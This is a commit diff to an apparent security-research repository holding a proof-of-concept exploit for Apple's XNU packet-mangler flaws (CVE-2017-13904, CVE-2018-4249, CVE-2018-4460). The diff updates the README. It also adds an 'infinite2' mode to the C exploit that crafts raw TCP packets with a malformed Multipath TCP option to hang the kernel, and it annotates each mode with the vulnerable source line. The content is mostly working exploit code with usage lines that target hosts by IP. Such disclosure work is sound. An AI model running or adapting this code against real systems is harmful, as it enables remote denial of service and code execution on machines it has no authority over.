Merge pull request #18 from kev/Apple_XNU_packet_mangler_v2

Sam · GitHub Enterprise · commit 7a1c22753740 · 2019-01-16T12:49:40.000Z
Apple xnu packet mangler v2
diff --git a/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md b/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
@@ -1,5 +1,7 @@
-## Remote code execution in Apple's packet-mangler (CVE-2017-13904, CVE-2018-4249)
+## Remote code execution in Apple's packet-mangler (CVE-2017-13904, CVE-2018-4249, CVE-2018-4460)
 
 Proof-of-concept exploit for remote code execution vulnerability in the packet-mangler component of macOS: CVE-2017-13904, CVE-2018-4249. The vulnerability was fixed in macOS High Sierra 10.13.5, which was released on June 1, 2018.
 
+Update: Apple's fix for the infinite loop bug was incomplete. The fix for CVE-2018-4460 was released on December 5, 2018.
+
 For details on how to compile and run this exploit, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904).
diff --git a/apple/darwin-xnu/packet_mangler_CVE-2017-13904/cve-2017-13904-poc.c b/apple/darwin-xnu/packet_mangler_CVE-2017-13904/cve-2017-13904-poc.c
@@ -15,6 +15,8 @@
 #include <netinet/ip.h>
 #include <arpa/inet.h>
 
+#define TCP_OPT_MULTIPATH_TCP  30
+
 // 96 bit (12 bytes) pseudo header needed for tcp header checksum calculation
 struct pseudo_header
 {
@@ -55,8 +57,9 @@ unsigned short csum(unsigned short *ptr, int nbytes)
 }
 
 enum Mode {
-  InfiniteLoopMode,
-  SmashStackMode
+  InfiniteLoopMode,   // CVE-2017-13904
+  InfiniteLoopMode2,  // CVE-2018-4460
+  SmashStackMode      // CVE-2018-4249
 };
 
 int main(int argc, char* argv[])
@@ -72,6 +75,7 @@ int main(int argc, char* argv[])
     printf("Usage: sudo ./a.out <source ip> <dest ip> <mode>\n");
     printf("Examples:\n");
     printf("  sudo ./a.out 192.168.0.8 192.168.0.12 infinite\n");
+    printf("  sudo ./a.out 192.168.0.8 192.168.0.12 infinite2\n");
     printf("  sudo ./a.out 192.168.0.8 192.168.0.12 smashstack\n");
     return 1;
   }
@@ -82,8 +86,14 @@ int main(int argc, char* argv[])
   dest_ip[sizeof(dest_ip) - 1] = '\0';
 
   if (strcmp(argv[3], "infinite") == 0) {
+    // CVE-2017-13904
     mode = InfiniteLoopMode;
+  } else if (strcmp(argv[3], "infinite2") == 0) {
+    // CVE-2018-4460
+    mode = InfiniteLoopMode2;
+    printf("infinite2\n");
   } else if (strcmp(argv[3], "smashstack") == 0) {
+    // CVE-2018-4249
     mode = SmashStackMode;
     payloadsize = 1000;
   } else {
@@ -117,9 +127,16 @@ int main(int argc, char* argv[])
   data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
   memset(data, 1, payloadsize);
 
-  if (mode != SmashStackMode) {
+  if (mode == InfiniteLoopMode) {
+    // Trigger bug here:
+    // https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/net/packet_mangler.c#L966
     data[0] = 2;
     data[1] = 0;
+  } else if (mode == InfiniteLoopMode2) {
+    // Trigger bug here:
+    // https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/net/packet_mangler.c#L993
+    data[0] = TCP_OPT_MULTIPATH_TCP;
+    data[1] = 0;
   }
 
   // some address resolution
@@ -149,6 +166,8 @@ int main(int argc, char* argv[])
   tcph->seq = 0;
   tcph->ack_seq = 0;
   if (mode == SmashStackMode) {
+    // Trigger bug here:
+    // https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/net/packet_mangler.c#L951
     tcph->doff = 0;
   } else {
     tcph->doff = 0xF;
